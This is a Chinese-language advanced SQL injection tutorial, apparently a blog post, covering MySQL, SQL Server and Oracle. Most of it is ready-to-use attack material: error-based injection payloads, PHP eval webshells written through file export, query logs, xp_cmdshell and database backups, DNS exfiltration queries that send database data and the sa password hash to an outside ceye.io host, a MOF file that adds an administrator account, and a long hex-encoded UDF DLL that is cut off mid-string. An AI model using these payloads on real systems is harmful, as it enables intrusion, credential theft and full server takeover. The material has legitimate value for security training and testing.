[vulnerability]SQL Injection·Advanced

[漏洞]SQL注入·进阶篇

目录

区分数据库

获取信息

技巧:

报错注入的报错方法

DNSlog 盲注方法

提权方法

过滤与绕过

0x00 探测语句

不同的数据库细节不同,差异还是不小的,常见的数据库主要有MySQL、SQL Server、Oracle。(SQLServer - MSSQL)

首先要分辨出是哪个数据库:

  1. 通过报错信息

    MySQL:

    you have an error in your SQL syntax,check the manual that corrsponds to your mysql server version for the tifht syntax to use near ” at line x

    SQL Server:

    Msg 170,level 15, State 1,Line 1

    Line 1:Incorrect syntax near ‘foo

    Msg 105,level 15,state 1,Line 1

    Unclose quotation mark before the character string ‘foo

    Microsoft ODBC Database Engine 错误

    Oracle:

    ORA-01756:quoted string not properly terminated

    ORA-00933:SQLcommand not properly ended

  2. 通过特有表判断

    MySQL:

    select count(*) from information_schema.TABLES

    SQL Server:

    select count(*) from sysobjects

    select count(*) from msysobjects

    Oracle:

    select count(*) from sys.user_tables

使用示例:

// MySQL

and (select count(*) from information_schema.TABLES)>0

// SQLServer

and (select count(*) from sysobjects)>0

// Oracle

and (select count(*) from sys.user_tables)>0

更多分辨方法见^ 1

区分出数据库之后,需要进行信息收集

MySQL

注释符

/* */

;%00

` (仅在语句末尾使用)

使用示例:

1
2
3
SELECT * FROM Users WHERE username='' OR 1=1 -- ' AND password='';

SELECT * FROM Users WHERE id='' UNION SELECT 1,2,3`';

数据库与系统相关信息

  1. 版本

    VERSION()

    @@VERSION

    @@GLOBAL.VERSION

    /*!mysql版本号 内容 */

  2. 主机名

    @@HOSTNAME

  3. 用户名(数据库当前使用的用户名)

    user()

    system_user()

    session_user()

  4. 库名

    database()

使用示例:

1
2
SELECT version();
SELECT /*!50000 'test', */ 1; -- mysql版本高于 5.00.00 的会执行/* */内的语句

确定字段数

  1. 1’ ORDER BY 1 –+

    使用示例:

    1
    2
    3
    4
    5
    6
    1' ORDER BY 1 --+
    1' ORDER BY 2 --+
    1' ORDER BY 3 --+
    1' ORDER BY 4 --+
    1' ORDER BY 5 --+
    ...

    比如,当order by 3 正常,order by 4 不正常时,字段数就是3

  2. SELECT null,null,null –+

    使用示例:

    1
    2
    3
    4
    5
    1' union select null --+
    1' union select null,null --+
    1' union select null,null,null --+
    1' union select null,null,null,null --+
    ...

    比如,当select null,null,null正常显示的时候,就说明字段数是3

    更多信息参考[^ 2]

SQL Server

注释符

/* */

;%00

使用示例:

1
2
SELECT * FROM Users WHERE username='' OR 1=1 --' AND password='';
SELECT * FROM Users WHERE id='' UNION SELECT 1,2,3/*;

数据库与系统相关信息

  1. 版本

    @@version

  2. 主机名

    host_name()

  3. 用户名

    user

    system_user

    session_user

  4. 库名

    db_name()

  5. 其他

    判断是否是SA权限

    is_srvrolemember(‘sysadmin’)

    判断是否是db_owner权限

    is_member(‘db_owner’)

    判断是否是public权限

    is_srvrolemember(‘public’)

确定字段数

  1. 1’ ORDER BY 1 –+

    使用示例:

    1
    2
    3
    4
    5
    6
    1' ORDER BY 1 --+
    1' ORDER BY 2 --+
    1' ORDER BY 3 --+
    1' ORDER BY 4 --+
    1' ORDER BY 5 --+
    ...

    比如,当order by 3 正常,order by 4 不正常时,字段数就是3

  2. SELECT null,null,null –+

    使用示例:

    1
    2
    3
    4
    5
    1' union select null --+
    1' union select null,null --+
    1' union select null,null,null --+
    1' union select null,null,null,null --+
    ...

    比如,当select null,null,null正常显示的时候,就说明字段数是3

    更多信息参考[^ 3]

Oracle

Oracle相比MySQL、SQLServer,SELECT 后必须跟表,不然会报错

所以Oracle有两个虚拟表

dual,user_tables

注释符

/* */

数据库与系统相关信息

  1. 版本

    select banner from v$version where rownum=1;

  2. 主机名

    select sys_context(‘userenv’,’host’) from dual;

  3. 用户名

    – 当前用户

    select user from dual;
    select username from user_users;

    – 查看所有用户

    select username from all_users;

    – 查看所有用户(需要有权限)

    select username from dba_users;

  4. 其他

    – 查看当前用户角色

    select role from session_roles;

确定字段数

  1. 1’ ORDER BY 1 –+

    使用示例:

    1
    2
    3
    4
    5
    6
    1' ORDER BY 1 --+
    1' ORDER BY 2 --+
    1' ORDER BY 3 --+
    1' ORDER BY 4 --+
    1' ORDER BY 5 --+
    ...

    比如,当order by 3 正常,order by 4 不正常时,字段数就是3

  2. SELECT null,null,null –+

    使用示例:

    1
    2
    3
    4
    5
    1' union select null from dual --+
    1' union select null,null from dual --+
    1' union select null,null,null from dual --+
    1' union select null,null,null,null from dual --+
    ...

    比如,当select null,null,null from dual正常显示的时候,就说明字段数是3

    更多信息参考[^ 4]

0x01 常用技巧

报错注入

MySQL

  1. floor() + count() + group by x

    版本:>5.0.96(更低版本或可用) <8.0.12(更低版本或不可用,5.7.26可用)

    1
    select count(*),concat(@@version,floor(rand(0)*2))x from information_schema.tables group by x;

  2. extractvalue(),updatexml()

    版本:> 5.1.5

    1
    2
    select extractvalue(1,concat(0x7e,(select @@version),0x7e));
    select updatexml(1,concat(0x7e,(select @@version),0x7e),1);

  3. geometrycollection(),multipoint(),polygon(),multipolygon(),linestring(),multilinestring()

    版本: > 5.5.47 < 5.7.17

    1
    select multipoint((select * from (select * from (select @@version)a)b));

  4. exp()

    版本:>5.5.47 <5.5.53

    1
    select exp(~(select*from(select @@version)x));

    详情链接[^ 5][^ 6]

SQLServer

  1. 强制类型转换报错

    1
    2
    select * from sysobjects where db_name()>0;
    select * from sysobjects where 1=convert(int,db_name());

    详情链接[^ 7]

Oracle

  1. ctxsys.drithsx.sn()

    1
    select ctxsys.drithsx.sn(1,(select user from dual)) from dual;

  2. XMLType()

    1
    select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual;

  3. dbms_xdb_version.checkin()

    1
    select dbms_xdb_version.checkin((select user from dual)) from dual;

  4. bms_xdb_version.makeversioned()

    1
    select dbms_xdb_version.makeversioned((select user from dual)) from dual;

  5. dbms_xdb_version.uncheckout()

    1
    select dbms_xdb_version.uncheckout((select user from dual)) from dual;

  6. dbms_utility.sqlid_to_sqlhash()

    1
    SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual;

  7. ordsys.ord_dicom.getmappingxpath()

    1
    select ordsys.ord_dicom.getmappingxpath((select user from dual),user,user) from dual;

    详情链接[^ 8]

使用示例

以MySQL的注入点为例

注入点为:

http://192.168.224.130/sqli-labs/Less-1/?id=1

如这里是用了union。要确定好这里的字段数,然后在select 后面对应上字段数,不够就添加null。

1
1' union select null,count(*),concat(@@version,floor(rand(0)*2))x from information_schema.tables group by x--+

Getshell

MySQL+PHP

outfile和dumpfile

前提:

  1. 获得网站根目录绝对路径
  2. php.ini 配置 magic_quotes_gpc = Off
  3. mysql 权限为 root 或 mysql在可解析目录下可写文件
  4. mysql.conf或mysql.ini 配置 secure_file_priv =

细节:

  1. 获得网站根目录绝对路径:可以通过报错、phpinfo页面、404页面等方式获得。
  2. magic_quotes_gpc可以通过phpinfo页面看是否关闭,也可以通过获取php版本来根据默认选项来判断 php<=5.2.7默认关闭 5.2.7<php<5.3.4 默认开启 php>5.3.4 配置被删除。
  3. mysql要在目录下有写权限,一般通过判断当前用户是否为root来看是否可写文件
  4. 如果有堆叠注入,可以查看配置项以及修改配置项,查看语句:show variables like ‘%secure_file_priv%’;

在前提都满足的情况下,通过 select into 写入webshell到网站跟目录或者写到其他可解析目录下:

1
2
3
1' union select 1,"<?php @eval($_POST['storm']);?>",3 into outfile "C:/Tool/phpstudy_pro/WWW/testshellcmd.php" --+
-- 或
1' union select 1,"<?php @eval($_POST['storm']);?>",3 into dumpfile "C:/Tool/phpstudy_pro/WWW/testshellcmd.php" --+

详情链接[^ 9][^ 10]

general_log和slow_query_log

前提:

  1. 获得网站根目录绝对路径
  2. php.ini 配置 magic_quotes_gpc = Off
  3. mysql 权限为 root
  4. 堆叠注入或者可以远程登录mysql

细节:

  1. 前三点的细节如上

  2. general_log与slow_query_log的区别,general_log是全量记录查询语句,slow_query_log是只记录慢查询语句,由于网站的慢查询语句比较少,所以使用slow_query_log会比general_log效果更好更容易成功

  3. 查看记录日志是否开启 

    1
    2
    3
    show variables like '%general_log%';
    -- 或
    show variables like '%slow_query_log%';

  4. 开启查询和设置路径

    1
    2
    3
    4
    5
    set global general_log = on;		--开启日志监测,默认关闭(如果一直开文件会很大的)
    set global general_log_file = 'C:\\Tool\\phpstudy_pro\\WWW\\testshell345.php';		--设置日志路径
    -- 或
    set global slow_query_log=1;				--启用慢查询日志(默认禁用)
    set global slow_query_log_file='C:\\Tool\\phpstudy_pro\\WWW\\testshell345.php';	--修改日志文件路径

  5. 写入webshell

    1
    2
    3
    select '<?php phpinfo();?>';
    -- 或
    select '<?php @eval($_POST[abc]);?>' or sleep(11);

  6. 关闭查询(最好还原日志路径)

    1
    2
    3
    set global general_log = off;
    -- 或
    set global slow_query_log=0;

    详情链接[^ 11][^ 12]

SQLServer

xp_cmdshell

前提:

  1. 获得网站根目录绝对路径
  2. 注入点可以堆叠注入或者可以构建if语句(形如:select 1 where 1=1 if 1=1)
  3. 有相应的权限db_owner

细节:

  1. 检查是否存在xp_cmdshell 

    1
    Select count(*) from master..sysobjects where xtype='X' and name='xp_cmdshell';

    返回值为1就是存在xp_cmdshell

  2. 2005之后默认关闭xp_cmdshell,检查xp_cmdshell是否关闭

    1
    SELECT CONVERT(INT, ISNULL(value, value_in_use)) AS config_value FROM  sys.configurations WHERE  name = 'xp_cmdshell';

    返回值为1就是xp_cmdshell开启

  3. 如果xp_cmdshell关闭,可以使用命令开启

    1
    2
    3
    4
    ;EXEC sp_configure 'show advanced options',1; //允许修改高级参数
    EXEC sp_configure reconfigure;
    EXEC sp_configure 'xp_cmdshell',1;  //打开xp_cmdshell扩展
    EXEC sp_configure reconfigure;

    使用示例:

    堆叠注入

    1’;EXEC sp_configure ‘show advanced options’,1;EXEC sp_configure reconfigure;EXEC sp_configure ‘xp_cmdshell’,1;EXEC sp_configure reconfigure;–+

    IF语句

    1’ if 1=1 execute(‘exec sp_configure ‘’show advanced options’’,1;reconfigure;exec sp_configure ‘’xp_cmdshell’’, 1;reconfigure;exec xp_cmdshell ‘’whoami’’’);–+

通过xp_cmdshell写入webshell到网站跟目录或者写到其他可解析目录下:

1
2
3
;exec master..xp_cmdshell 'echo ^<?php phpinfo();?^> > C:\Tool\phpstudy_pro\WWW\testshell.php' ;--+
-- 或
1' if 1=1 execute('exec master..xp_cmdshell ''echo ^<?php phpinfo();?^> > C:\Tool\phpstudy_pro\WWW\testshell.php'' ;');--+

关于突破堆叠注入[^ 13]

差异备份

前提:

  1. 获得网站根目录绝对路径
  2. 注入点可以堆叠注入或者有sqlserver shell
  3. 有相应的权限db_owner

细节:

  1. 获取当前数据库名称或者创建一个数据库 

    1
    2
    3
    4
    -- 获取当前数据库名称的例子
    -1' union all select null,db_name()--+
    -- 创建数据库
    1';create database test2;--+

  2. 备份数据库

    1
    1';backup database test2 to disk = 'C:\phpstudy\PHPTutorial\WWW\test2.bak';--+

  3. 创建新表并且插入数据

    1
    2
    1';use test2;create table [dbo].[test2] ([cmd] [image]);--+
    1';use test2;insert into test2(cmd) values(0x3c3f70687020706870696e666f28293b3f3e);--+

    3c3f70687020706870696e666f28293b3f3e 为16进制的 

    1
    <?php phpinfo();?>

  4. 进行差异备份

    1
    1';backup database test2 to disk='C:\phpstudy\PHPTutorial\WWW\test2.php' WITH DIFFERENTIAL,FORMAT;--+

  5. 访问webshell

    如果不成功,可以不断请求,使用条件竞争访问

  6. 最后不要忘记删除数据库或者表

    1
    2
    1';drop database test2;--+
    1';drop table test2;--+

    PS: 在不存在堆叠注入的情况下,使用 execute 无法备份

log备份

前提:

  1. 获得网站根目录绝对路径
  2. 注入点可以堆叠注入或者有sqlserver shell
  3. 有相应的权限db_owner
  4. 数据库备份过

细节:

  1. 获取当前数据库名称

    1
    2
    -- 获取当前数据库名称的例子
    -1' union all select null,db_name()--+

  2. 将数据库设置为完整恢复模式

    1
    1';alter database test set RECOVERY FULL--+

  3. 将数据库备份到指定目录

    1
    1';backup database test to disk = 'C:\Tool\phpstudy_pro\WWW\test.bak' with init--+

  4. 创建一个表,包含一个image类型的字段

    1
    1';create table cmd(a image)--+

  5. 将一句话木马插入到cmd表中

    1
    1';insert into cmd(a) values (0x3c3f70687020706870696e666f28293b3f3e)--+

    3c3f70687020706870696e666f28293b3f3e为16进制的

    1
    <?php phpinfo();?>

  6. 通过数据库日志备份,将webshell备份到指定网站目录下

    1
    1';backup log test to disk = 'C:\Tool\phpstudy_pro\WWW\test.php'--+

    详情链接[^ 14]

更多详情见链接[^ 15][^ 16]

Oracle

使用储存过程

前提:

  1. 获得网站根目录绝对路径
  2. DBA权限
  3. 需要Oracle shell

细节:

  1. 创建一个oracle的目录对象指向网站根目录绝对路径或者可解析目录

    1
    create or replace directory WEBSHELL_DIR as 'C:\Tool\phpstudy_pro\WWW';

  2. 授权

    1
    grant read, write on directory WEBSHELL_DIR to system;

  3. 写入webshell

    1
    2
    3
    4
    5
    6
    7
    8
    declare
      webshell_file utl_file.file_type;
    begin
      webshell_file :=utl_file.fopen('WEBSHELL_DIR', 'webshellaa.php','w');
      utl_file.put_line(webshell_file, '<?php eval($_POST["pass"]); ?>');
      utl_file.fflush(webshell_file);
      utl_file.fclose(webshell_file);
    end;

    相关链接[^ 17]

getshell总结[^ 18]

dnslog 外带

dnslog服务器可以自己搭建^ 19或者使用dnslog平台^ 20

使用之前先看如何使用dnslog教程^ 22

MySQL

1
SELECT load_file(concat('\\\\',(select database()),'.cmr1ua.ceye.io\\abc'))

示例:

1
http://127.0.0.1/lou/sql/Less-9/?id=1' and load_file(concat('\\\\',(select database()),'.cmr1ua.ceye.io\\abc'))--+

注:如果带有特殊字符,可以使用 hex() 编码之后再发送

注2:只能在服务器是Windows的情况下使用,Linux不可用

详细链接^ 22

SQLServer

1
2
3
4
5
6
7
DECLARE @host varchar(1024);
SELECT @host=(SELECT TOP 1
master.dbo.fn_varbintohexstr(password_hash)
FROM sys.sql_logins WHERE name='sa')
+'.ip.port.b182oj.ceye.io';
EXEC('master..xp_dirtree
"\\'+@host+'\foobar$"');

示例:

1
http://127.0.0.1/mssql.php?id=1;DECLARE @host varchar(1024);SELECT @host=(SELECT master.dbo.fn_varbintohexstr(convert(varbinary,rtrim(pass))) FROM test.dbo.test_user where [USER] = 'admin')%2b'.cece.b182oj.ceye.io'; EXEC('master..xp_dirtree "\'%2b@host%2b'\foobar$"');--+

Oracle

都需要配置网络权限

1
2
3
4
SELECT UTL_HTTP.REQUEST((select user from dual)||'.b182oj.ceye.io') FROM sys.DUAL;
SELECT DBMS_LDAP.INIT((select user from dual)||'.b182oj.ceye.io',80) FROM sys.DUAL;
SELECT HTTPURITYPE((select user from dual)||'.xx.b182oj.ceye.io').GETCLOB() FROM sys.DUAL;
SELECT UTL_INADDR.GET_HOST_ADDRESS((select user from dual)||'.ddd.b182oj.ceye.io') FROM sys.DUAL;

提权

MySQL

mof提权

前提:

  1. 必须是Windows系统,且为 Windows Server 2008 以下版本
  2. mysql启动身份具有权限去读写c:/windows/system32/wbem/mof目录(
  3. mysql.conf或mysql.ini 配置 secure_file_priv = (mysql 5.7 开始默认 secure-file-priv = null)

细节:

  1. mof文件内容,此文件是在服务器上添加一个用户 hpdoger 123456,可以自行替换其他命令
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user hpdoger 123456 /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};

  1. 将上面的文件传到目标服务器上(如果可以直接传到 *c:\windows\system32\wbem\mof\* 目录下,那也没有必要用这种方式提权了),然后执行

    select load_file(‘文件位置’) into dumpfile ‘c:\\windows\\system32\\wbem\\mof\\nullevt.mof’;

  2. 如果没有可以上传文件的方法,可以用MySQL的导出文件方法,如下:

    • 将上面mof内容保存一个文件,然后在MySQL里对文件进行hex()

      select hex(load_file(“C:\Tool\XY\test.mof”));

      得到一个hex后的字符串

    • 在目标服务器的MySQL上执行导出文件,如下:

      select unhex(‘hex后的字符串’) into du\mpfile “c:\\windows\\system32\\wbem\\mof\\nullevt.mof “;

  3. 然后将命令换成

    net.exe localgroup administrators hpdoger /add

    将用户添加到管理员组

详情看链接^ 23

udf提权

前提:

  1. 有MySQL shell (远程或者本地)
  2. mysql.conf或mysql.ini 配置 secure_file_priv = (mysql 5.7 开始默认 secure-file-priv = null)
  3. 启动MySQL的用户为root(Win 忽略)

细节:

  1. 准备 udf 文件,可以从 kali 的 msf 中获取,位置为 /usr/share/metasploit-framework/data/exploits/mysql

  2. 查看版本

    1
    select version();

    查看系统架构

    1
    show variables like "%compile%";

    查看plugin的位置

    1
    show variables like "%plugin%";

  3. udf文件放置位置根据MySQL版本和系统版本,分为不同情况

    • MySQL < 5.1

      windows server 2003 – c:\windows\system32\

      windows server 2000 – c:\winnt\system32\

    • MySQL >= 5.1

      MySQL目录\lib\plugin\

  4. 根据系统和架构,选择对应的 udf 文件上传到指定位置

    Windows选择dll,Linux选择so

    如果有webshell,可以直接上传文件,如果没有,可以参照如下步骤

    • 将文件用类似 010editor 这样的软件打开,然后导出为十六进制文件

      010editor -> File -> Export Hex -> 默认Export Type为 Hex Text,默认Bytes Per Row为16 -> Export

    • 打开txt文件,将空格和换行清除,变成一行字符串

    • 在最开始部分加上0x

    • 使用select into dumpfile 将字符串导出成文件

      select 十六进制字符串 into dumpfile ‘指定位置/udf.dll’;

      1
      select 0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000677CBFDA231DD189231DD189231DD18904DBBF89211DD18904DBBC892A1DD18904DBAA89261DD189231DD0890F1DD18904DBAC89211DD18904DBA089221DD18904DBAB89221DD18904DBA989221DD18952696368231DD189000000000000000000000000000000005045000064860300A727A15A0000000000000000F00022200B020800002000000010000000800000109F000000900000000000100000000000100000000200000400000000000000050002000000000000C000000010000000000000020000000000100000000000001000000000000000001000000000000010000000000000000000001000000098B2000008020000B0B10000E800000000B00000B00100000050000050010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000800000001000000000000000040000000000000000000000000000800000E0555058310000000000200000009000000012000000040000000000000000000000000000400000E02E727372630000000010000000B000000006000000160000000000000000000000000000400000C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332E393100555058210D240209E1E421439D3BDFB7DE7400000F0F0000002A0000490000D41DE9FEFF833A007450488B05A421000049890009A24008CD4973D20A9F109C1899CD9F34272096280FB70593666D83FDB7410B30B001C332C0C3CC00C215CC92C9BA810034716A6FEBCC16E46C096A471853FDBF1FA4631C0FB605591688401E41C7011E00FFED6DD62B8B63BF01750F3F42088338007506C64B26EBDC01017B4E2D632B05B9E4B228CE25227ED20CD26F1F28152AB001C3F66D7BC2BF83EC38344A43895C243084B7FFF6DBD90B09FF15C71F2B4885C04C8BD87512104C24DF6EAEB9608707202DC4388E897C242873EDCDFD33C048C7C1FF0033FBF2AE1C120976D9B75B1AF7D122E901890B2DCC00BE6FEB166F28E3026E404848DEDA7FDB29F938D87459488D0D40EE4E0E813832983DE4C1EB81403281480A9EE4435E4F81503281543281563261F37D4FB0018C48804028C34C49467607744E61DEED584917E49260680A703C6527CD18782056C740045CF8BF33B64342188B48048B008D4C010239BD1E77D27D8BD947107543706D8045EC1BE936130309884370900A00B69DEE10C8980A18BC0CB3C6B00E07103FBCB37DDB0F49A585C974066F5D17B7086D21CF93CF047424ADA3B9772D7110448B6949E2FA02C2EDDFBA52E2CE0212498D5C3001E83F0FFCE85CD7FDDD5FEBCB418B03C60430D2470D5734B70C58D7E22D0822D34313167BB75BCE2618007CA01CFF56677C84842F7198F4CF16C64373870D087C8C03D6E4240F79561E541E511E7292939C4E1E4B1E481E63C2425E3E1E1FCF2784EE87C71F1DA0981F4C89C68685EE44241824580F6C59897486BB86DB76381764BDB900D34C18284CB0DB7E302D4D8BF146E8E7B901EE9B6DC1EC04E00DDA4533ED4488670BEEF69B4FF04C39290F8413050673F215FDCFB8B9169125AC1C088BE8747B418D5508E1C9B6B13AC0E6CC177C7466A04B6640FA50669047FC3F42858E1B0B9529328D7936CE6F7D61C16C304375CD8CC74803C8F56636B724D470143E51C5BA08E1D9B68D39CC1CEB13225975AD886CDBB6F050EB258BC77004CD1930DDFE9CDB803E30E2154874229245FFB176D8827811FEF5887EDD4D174EBE5A0EEBC18424805EC606E71ADA0001380C4C38F12A10F8386C04C6F0A0581A87E792317FD3DC5CD8D6D09D58747A28F2023F73B773DF3E448D48406E41B80010B3748BD1F10DF7C7ED33C9AB441A5356104CEFA2DBE6B66C02C8D8154E1B8D54B94C350AEDE98D054A75890BA3B16E3B2DBC3133D2C7D0208925183BDF19B7B3BAD2C80DF2199D30AC581E29EB081433C0922FB384F13BE0064CEB0033C029001BB0DFB65538EC024510FF10C9196600FB6F7F6C900390483B0D89293F751148C1C11066F7DDDD6FDFB87502F3DAC1C910E9150AECCC405361203B8B7D1B5801A05FDCD25B0BFBEEF7F685DBC905112FD005020675098D430185BB76EFB6205B42C703D59B0D3C48B406634136670B1C5805B12006615BD85BC3CF55D27F6CC7C7C376FC608468E140DCFBF1C2C63831E83BE141BDD20F8503EE46BB7408075EE428073C0F8E0D8DE6B61B6E2BC58ED3105FDCFD3E76FB0FB12D602E0A741EF290B9E803C91D19BFDB36931D4275E841320783F802740FB9EF6DC3B31FB70ECA0208E2ED0D2F2E338E740FD2111912F874491412FC18DADC0B1FD958F847DF72165F1803B6BB2D701E4AD0C9EB081573ED12ECF6BEDBCF2774192D06429BD72D0698FBFB66D833DB891DB80E871DB906716FC7FEB59806E5413BD5DDE26541042530BB7DBBBD002C0978081E8BF3F048B93D883072B0B7920A63C7741AD64618D7D29B2F1C6B75E3EB037BF5A79A5ED6390C950CDAEB3FEA1F9F7DB7F08E8F080644892D312D1BC485C0678FED62771A15E5DE0DD6181ABE7FDDBBEEC7050725024585F67507B404BB833D14DDC96E73068B212A0B2D5C6F11DEDD264FE3029CF12C66012D3A273E9E9EBE10C58F38D240E468EC98717A60DCE91748C3B14D22190F6C20483A5ADBF308505851F0DD05BBEE77DF3D041F208915D12695D275133915D709ED7F38C3750B5A17C61E83FA017405040ADD6BE00275338931D39D08A3B71B0D34C84E20C574134AC68B07863DB9D7A64BFC1616E0C9016B3C1A0EDC83FFB092EBDA1535AB311BC11BDB5B0BD80C430C1DC817084D7BF787755C0B1841FFD385FF88FF03753970F79D75094A08AEEB8D1CA51E36EC648B171028ADEB06D8192ECC298ADC25F3008BC3659E8793708B218B8BF8B59D9E2A4055BF15EAA3894D7AFAB61B01018B080724B0D67D5D902DD9C2302F5E7D0AB1485825FF4DDB960C1E92387D2EDA02F101D7136FA3F875056C0CFCFA7D918844A4FD258B036983EB2F9E8E090CEFC6F852A1899E2681EC880068CD760DBFFE73153F156705B8C648F25845B7390CB8283D1F2C586170C339DEF61624EB754148B73DC6364238004044230430090E662FCF40280578254703055C73874C1C51494E7D4BB1077F4BF0EB222B8093447BDD837D738D0E83C00812D13E8D67DB7B642A059B240D20902F9C5BA25B701C2A7214097BC009CC3E1E666C926724766E833572DBFF0B70DC7A142F482C38B0BB2493827B8EF083D2396A14019B15650CCB36DC9255B624C80A271B83D76C1854BA6A234E336B1784F781C4ACA041592947A626231C0FD8CF53188186D9EF0D68295A4A148A8EF8ECECCDD64427CB1366EB75B908674B32D21DEA902D3A1C1128106464200A8B83AF334463971BCB36E418C323DB83A238243D05F62809993959B611402BDC678C90C136DE1BC3017F37320296247F15F4F6120D6276D81BC00383E8013C2075643F289C8D3D53041A787F4B8D1D4C068D13A08491790EC372B3326129A9EF4F137F2344720CC96681394D5A75FCB7C3FF174863513C813C0A5045E1137C0A180B020F94C063E343029F4C63413CFEC9B4EBED8D7ED24C03C1413C4014450458064525FFC25F6A4AB10018741F8B510B3BD2720A8B4108ED6FF8DB03C209D072104183C113C128453BCB72E16FC796B05D1CC1C3CF4CC1267AF7446992E1DA85DCBD1F4C2BC15FEAFB5ABED0140CCD0F3A24C1E81F600D2CFEF7D083E001EB02584FD644AB360196EBCAC0B66C3008EEC18B01A7FFAA128D3CC77627252205CC11CE78DCA606CB113F75463DA70FF0DD4603241B471EB801000000277C29847F3FE520000081BFF83C3DFC32A2DF2D992B7DC7F83074149D6FA3D00E7F5DC6268B2DC285586B212430BC6286B6489934E10AB9B4C856E04671D849460BB50E731C0EB110D9BE10A8D813FE6A4CB84C33DBCEB8FF00856037BA1623E9B8338975DDE016B1DF744D44D89C1D39B705DBDD8449F7D3093720D2FBDC4B4646463605DEE0E2E4B24746465E505A11000055C9A8AA298064547FB017D8069017303007D04E6F206172FFFFDFFE67756D656E7473096C6C6F77656420287564663A206C69625F6D79730BF6B7DD716C0D5F73085F696E666F29411C80EDFF232076657273696F6E20302E0134EDEDEE17A178706563744B657861076C79201A6DBB7DFB652073747243672074791B2070766175D8299B6D21724F2F7477996D60010B1F438EF6F603FB72206E616D4C436F756C246E6F74CCE8B66D3B63611320186D27796372FF850740310106023532023001240D0024F6FFB7FFD407001FC408001A740B15640C0010540B000B340A0004822776BBDCFE1918090018C40F13740E640B093427B763D4ED046217D41E5E3F1903241AEDBACF2C5007390F2A07801ABBDC6E8367165B16743711640C340B7BD85B770442130C390C01118350118B9B6DF705530133871C03E4001D5D90ED60430E057B743F09BAEEB0D80401072F67079403A06077DBC10701462F462B1074092F0DB6D94E3416033B01000715BB0BB6BD971574062F64F7DF21000884DDB640AE043439741F00BF20EEECEDB6140629034C341F0BA903E1C2DEBE240F05C305340A13234BD36D9B6E23431E14C45F0F470A75B713760554094B01098909A2071E7DE572BB1F1E742F12640D34870142B71582BB2E1311CF0C03CA96DD0E01380F387427005124A3AAFEC10246DDCD5D20D266D4FF555516C900178FA02A1B003011764BD56C039180BFA007E0126DD79DDD03703407F803680B0013026A76FBBA8603540B14021814170B581590FB2F07D9EEECF60A150310340727030034075BD5B9DD7003E0336F0724B3CC755DD7750B30074203AC0B9007F5B61B94DB03C03233920C1903C8BA05A0EB0B10074F8BE80B508375AFEB077303444707990BA0B65DD77507E503280BF0073A1C033C0038B7EB0B5007F71CA70B77B63BDB8B191D2F2007381DCB40071DAC7B5D83036C8307D30B601E9DED5EB3039B7C5F07C11E3BE0D0AE3BDB07031F3B1007D6039C33CA1255954A005525A3AAA8AA9251645455C9D09BA0887C0402C4FF16360157616974466F7253AC7F2B40FC6C654F626ABD14566972747561F63703C46C419A0D536574456E76126DBF01E26F6EE45661726961622B41EB2E40BC18437265B8546806640DF65BF76D47264375727222502A636573734914E283CD1226135469636BB6FD6E03026E6B517565727950036684DEDBB1F66D616E3716657218446973676FDBDBCF374C6962727879436192731A52746C633BB76D0970A2722D2C7874124CBDB5ADFD6F6F6B7570463EC26916B2747279DFB5078B17CD556E77E47E4973446562736F6BED75676763A7A56583E11DFEB6B77268616E64457883704046696CA56C85C58719F19319DAB61254176D65151153DAF6586B39352B537973176DFA81E87517454173426509A3DBFE434388A0895F616D73675FCC6990B3850BBF5F5F435F73708B6966285F7E267CDB766F5F64116F035F706F6922430B76DB2663DA5F64CE280009626B31142D325F7A13C417840B5F7B50705B6C735F330A6C212205DB5ACCD82A58096E73ED6BC982130FD76D643ED6BAD6DE756C343F15416D170CDEA3E0020AB52689A3B565C933A196063BC16DB15B0772652508661115080D5BA1739C29709F73149BB5ADB93932AE6E074D0F85D7BADBC56F736A663A70105E3B84ED70705831747B6D343FDF15F4C700F08C21180800E264860600A76EFB0FE327A15AE6F00022200B020808120CB07744B314132E0010000005CF1E6C9B02020433050002088000C302F663146D160100022E063AF76C650F0A50394330908DE8DB88223C1460E2D880D4BD0118020183703AACBB024B00303A011E4644A42B2E1054822D3BD810901200DC00B3DBC63B6F602E7264A76108550B53597761DD000C03162740022E26291B61F600D805100C22273616ECECC02E702850EB27244FD820FC007273726300136027B3C7013226650942FCA664B0702728421B4036C08D6D05CA7212D3060000000000009000FF0048894C240848895424104C8944241880FA010F854502000053565755488D35CDF0FFFF488DBE0080FFFF5731DB31C94883CDFFE85000000001DB7402F3C38B1E4883EEFC11DB8A16F3C3488D042F83F9058A1076214883FDFC771B83E9048B104883C00483E9048917488D7F0473EF83C1048A10741048FFC0881783E9018A10488D7F0175F0F3C3FC415BEB0848FFC6881748FFC78A1601DB750A8B1E4883EEFC11DB8A1672E68D410141FFD311C001DB750A8B1E4883EEFC11DB8A1673EB83E8037217C1E0080FB6D209D048FFC683F0FF0F843A0000004863E88D410141FFD311C941FFD311C9751889C183C00241FFD311C901DB75088B1E4883EEFC11DB73ED4881FD00F3FFFF11C1E83AFFFFFFEB835E4889F7B900120000B2004889FBEB